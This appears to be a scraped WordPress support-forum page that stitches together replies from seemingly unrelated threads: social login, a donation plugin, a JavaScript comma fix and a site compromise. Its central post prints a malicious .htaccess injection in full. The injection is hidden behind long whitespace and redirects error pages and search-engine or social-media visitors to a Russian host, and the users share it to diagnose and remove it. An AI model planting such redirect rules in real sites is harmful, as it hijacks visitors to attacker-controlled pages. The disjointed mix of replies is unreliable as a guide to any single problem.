deenorris

I have the same issue. Is there a solution to this? Just started, so it may be a settings change, but I can’t figure out the correct setting.

BEHAVIOR: Existing users who previously registered via WSL and FB are getting an intercept to confirm the email/user_name.

I can see this correctly occurring for new users, but not for existing users.

Suggestions?

Flip the plug-in to sandbox mode. Run the transaction into the database and then edit to match the donation information.

Don’t forget to flip the plugin back in to live mode

So what was the solution? I have the same issue

you have to change the permissions to allow Owner Read/Write first

The hack sets the file to read only

Hardening WordPress

Never even got as far as debug. Once I figured out the .HTACCESS trick, I removed the offending IF BLOCK and it was fine.

It was odd that every time I tried to access ADD LINK from the dashboard, it make a call to the .RU address and I got the crappy imitation. Once I removed the .HTACCESS hack, it stopped.

Again, I am not accusing, but clearly something is going on.

When I spoke to my hosting company, HOSTMONSTER, they said they are seeing a lot of this hack in the past week or so from WP users.

You need to modify the .HTACCESS in the PUBLIC_HTML folder to removed the hack.

First you need to change the permissions because the hack sets it 444.

Once you have edited the .HTACCESS file, you should harden it by setting it back to 444.

This is a hack using wordpress itself to modify the .HTACCESS file.

Good Luck

Be sure to scroll right to see the entire hack.

This turns out to be a htaccess hakc-

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

																														ErrorDocument 400 https://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 401 https://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 403 https://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 404 https://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 500 https://promosoftware.ru/apacabar/inde.php
																														<IfModule mod_rewrite.c>
																														RewriteEngine On
																														RewriteCond %{HTTP_REFERER} .*google.* [OR]
																														RewriteCond %{HTTP_REFERER} .*ask.* [OR]
																														RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
																														RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
																														RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
																														RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
																														RewriteCond %{HTTP_REFERER} .*qq.* [OR]
																														RewriteCond %{HTTP_REFERER} .*excite.* [OR]
																														RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
																														RewriteCond %{HTTP_REFERER} .*msn.* [OR]
																														RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
																														RewriteCond %{HTTP_REFERER} .*aol.* [OR]
																														RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
																														RewriteCond %{HTTP_REFERER} .*goto.* [OR]
																														RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
																														RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
																														RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
																														RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
																														RewriteCond %{HTTP_REFERER} .*search.* [OR]
																														RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
																														RewriteCond %{HTTP_REFERER} .*bing.* [OR]
																														RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
																														RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
																														RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
																														RewriteCond %{HTTP_REFERER} .*blog.* [OR]
																														RewriteCond %{HTTP_REFERER} .*live.* [OR]
																														RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
																														RewriteCond %{HTTP_REFERER} .*mail.* [OR]
																														RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
																														RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
																														RewriteCond %{HTTP_REFERER} .*ya.* [OR]
																														RewriteCond %{HTTP_REFERER} .*aport.* [OR]
																														RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
																														RewriteCond %{HTTP_REFERER} .*flickr.*
																														RewriteRule ^(.*)$ https://promosoftware.ru/apacabar/inde.php [R=301,L]
																														</IfModule>

Yes, I am sure it has been hacked, but it is only this plugin that is affected. Someone is writing a hack specifically for this. Trying to delete the plugin causes the same poor quality fake dashboard.

Next week was two weeks ago. Should I start editing existing code or wait a few more days?

Markus – You did the hard work. I just posted the edit.

Thanks!

I guess once they post a working update, we can close this thread.

I removed the comma on Line 25 of connect.js and it works correctly now.

The line now reads:

close: function(){$(document).unbind('click', overlay_click_close);}

Just kinda a curious why the URL would matter when posting a bug report! Did you think you would get cooties just by posting on the same thread?

Sheesh!

Thanks!